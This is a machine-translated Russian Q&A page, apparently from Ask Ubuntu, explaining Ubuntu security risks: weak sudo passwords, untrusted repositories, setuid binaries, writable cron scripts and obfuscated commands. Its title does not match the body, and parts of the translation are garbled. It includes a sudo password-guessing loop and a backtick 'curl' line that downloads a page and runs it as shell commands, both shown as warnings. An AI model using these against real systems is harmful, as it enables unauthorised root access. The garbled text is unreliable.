Компьютер не приостанавливается, когда он неактивен в основной строке входа в систему

Не удалось взломать пароль root, потому что Ubuntu по умолчанию отключил пользователя root. Однако, если ваш пользователь может стать root через sudo, и ваш пароль легко угадать / перебор, у вас есть небезопасная система. Пример скрипта, пытающегося проверить некоторый пароль:

#!/bin/sh
for pass in password 123 ubuntu pass; do
    echo $pass|sudo -S evil_command
done

Добавление ненадежного репозитория позволяет устанавливать программы из этого репозитория. Даже если вы явно не устанавливаете такое приложение, как sudo apt-get install [app-from-repo], репозиторий может по-прежнему влиять на другие программы, заставляя Ubuntu полагать, что репозиторий содержит более новую версию определенной программы.

Процесс обновления запускается как root, иначе файлы не могли быть записаны в /usr/bin или /etc. Триггер установки запускается также как root и может запускать произвольно и, возможно, вредоносные команды. Теперь не волнуйтесь, для обновления программ необходимы ручные действия, и хранилища Ubuntu безопасны. Программное обеспечение с закрытым исходным кодом, такое как Windows, никогда не может быть полностью доверено, потому что вы не можете проверить источник вредоносного кода, но вы можете просмотреть источник приложения Ubuntu, если вам нужно (не относится к проприетарным программам, таким как sun-java6 или Flash]. [ ! d2]

Как упоминалось в Javier Rivera, ошибки ядра могут привести к произвольному выполнению кода, но опасное программное обеспечение также опасно, особенно багги setsuid корневые двоичные файлы (двоичные файлы, которые будут выполняться под владельцем файла, root) и другие (! d3)

Вы можете создавать дыры в системе, если не обращаете внимания на то, что вы делаете. Например, без полного понимания концепции cronjobs вы добавили cronjob к /etc/cron.daily, который запускает программу в вашей домашней папке (например, /bin/sh /home/your-username/myscript.sh. Если файл myscript.sh доступен для записи, вы можете быть удалены вами , эксплойт может помещать вредоносный код в myscript.sh, который будет запускаться как root (эскалация привилегий).

Чтобы оставаться в безопасности, используйте свой ум! Не запускайте команды из ненадежных источников, если вы не знаете, что если кто-то говорит run `curl 3221233674` с обратными тиками, нет. 3221233674 - это еще один способ написать 192.0.32.10 (IP example.com). Таким образом, он будет равен:

`curl http://example.com/`

Эти обратные тики заставляют вывод выполнять как команды оболочки. На простом английском языке «Загрузите страницу http://example.com/ и попробуйте выполнить загруженную страницу».

Сначала , вы не увидите что-то злонамеренное в данной команде, но теперь вы знаете, что это тоже можно злоупотреблять.

Всегда проверяйте команды / сценарий, которые вы получаете из ненадежных источников, таких как Интернет.

1
задан 6 October 2014 в 12:35

0 ответов

Другие вопросы по тегам:

Похожие вопросы: